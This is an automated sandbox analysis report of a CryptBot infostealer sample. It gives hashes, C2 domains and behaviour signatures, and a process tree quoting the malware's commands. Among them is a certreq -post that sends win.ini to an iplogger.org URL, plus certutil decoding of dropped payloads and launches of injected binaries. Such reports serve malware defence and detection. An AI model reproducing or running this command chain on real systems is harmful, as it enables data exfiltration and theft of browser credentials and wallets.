Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    26/03/2025, 00:27

General

  • Target: 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe
  • Size: 1.8MB
  • MD5: d8a8599e2325010e356d1bf13395e0af
  • SHA1: 689a59ba3a0c4cfcbae7201cc09a986bc968b8f2
  • SHA256: 021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba
  • SHA512: a56632b88a8b5e2bb938ee68a6a672650d2386ea18975b9d58156f2ad9efac5e4d6fa574e4c28a213cffd5c44c0355c5005e04b9801c92fe2ceef4a342e08799
  • SSDEEP: 49152:6sOXm4VF5ZCVpSm3/gjkl0+827d/GpncQ:6nxwDf3IjX27ocQ

Malware Config

Extracted

Family

cryptbot

C2

nkoopw11.top

moraass08.top

Signatures

  • CryptBot

    CryptBot is a C++ stealer that is widely distributed bundled with other software.

  • CryptBot payload 2 IoCs
  • Cryptbot family
  • Manipulates Digital Signatures 1 TTPs 3 IoCs

    Attackers can modify the Authenticode and Cryptography registry keys so that their binary is accepted as validly signed.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Deobfuscate/Decode Files or Information 1 TTPs 2 IoCs

    Payload decoded via CertUtil.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 22 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe
    "C:\Users\Admin\AppData\Local\Temp\021fb6384caf7f0b9afadbe363849424073d001c162eaa30ec1c4e18359734ba.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo UfkgJKZQP
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1936
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3320
      • C:\Windows\SysWOW64\certreq.exe
        certreq -post -config https://iplogger.org/1arur7 C:\Windows\win.ini
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3216
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < OLicGk.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4208
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:640
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 1 ALq.Iqg
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3008
        • C:\Windows\SysWOW64\certutil.exe
          certutil -decode gvceXcfUhq.com U
          4⤵
          • Manipulates Digital Signatures
          • Deobfuscate/Decode Files or Information
          • System Location Discovery: System Language Discovery
          PID:2100
        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
          msdtc.com U
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4044
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com
            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com U
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4028
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Executes dropped EXE
              PID:408
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious use of FindShellTrayWindow
              PID:1924
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 3
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:1660
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cmd < iphPyYJYUVPAWekxoF.com
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5040
      • C:\Windows\SysWOW64\cmd.exe
        cmd
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1108
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 1 ovPEN.QDIv
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2936
        • C:\Windows\SysWOW64\certutil.exe
          certutil -decode QrHZW.com T
          4⤵
          • Deobfuscate/Decode Files or Information
          • System Location Discovery: System Language Discovery
          PID:3524
        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
          lsm.com T
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1340
          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com
            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\lsm.com T
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:4172
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious use of WriteProcessMemory
              PID:3764
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\sxfisxvsjwl.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2732
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\kqvspsntve.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                PID:1372
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 3
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:3276

Downloads

  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\OLicGk.com (2KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\QrHZW.com (821KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\T (597KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\TEYCayDdYIwJDFmJ.com (633KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\U (622KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\UucapEhaDdp.com (120KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\gvceXcfUhq.com (855KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\iphPyYJYUVPAWekxoF.com (2KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\msdtc.com (921KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe (76KB)
  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\yZwIFsEsLlrEAM.com (921KB)
  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\_Files\_Information.txt (7KB)
  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\_Files\_Screen_Desktop.jpeg (47KB)
  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\files_\system_info.txt (7KB)
  • C:\Users\Admin\AppData\Local\Temp\TntHipOZP8\qzQTXaK5BZYiy.zip (41KB)
  • memory/1924-44-0x0000000000400000-0x00000000004A3000-memory.dmp (652KB)
  • memory/1924-42-0x0000000000400000-0x00000000004A3000-memory.dmp (652KB)
  • memory/3764-261-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)
  • memory/3764-263-0x0000000000400000-0x0000000000423000-memory.dmp (140KB)